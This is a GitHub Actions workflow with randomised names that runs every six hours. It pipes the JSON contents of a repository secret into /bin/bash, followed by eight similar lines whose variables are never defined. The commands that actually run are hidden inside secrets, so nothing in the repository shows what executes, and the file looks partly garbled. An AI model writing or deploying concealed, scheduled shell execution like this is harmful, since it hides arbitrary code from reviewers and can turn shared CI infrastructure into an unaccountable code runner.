name: caidefine

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidefine
        env:
          joq53: ${{ secrets.joq53 }}
        run: |
          echo $joq53 | jq -r .dsqui49016 | /bin/bash
          echo $fzt42 | jq -r .byfk53535 | /bin/bash
          echo $sjgcx18 | jq -r .aaky17929 | /bin/bash
          echo $dbug13 | jq -r .et318 | /bin/bash
          echo $k528 | jq -r .rbfkt9565 | /bin/bash
          echo $ik42934 | jq -r .f4 | /bin/bash
          echo $wpgs8 | jq -r .jrs8 | /bin/bash
          echo $fnb28329 | jq -r .exfa92884 | /bin/bash
          echo $zdhh0795 | jq -r .xyq6 | /bin/bash

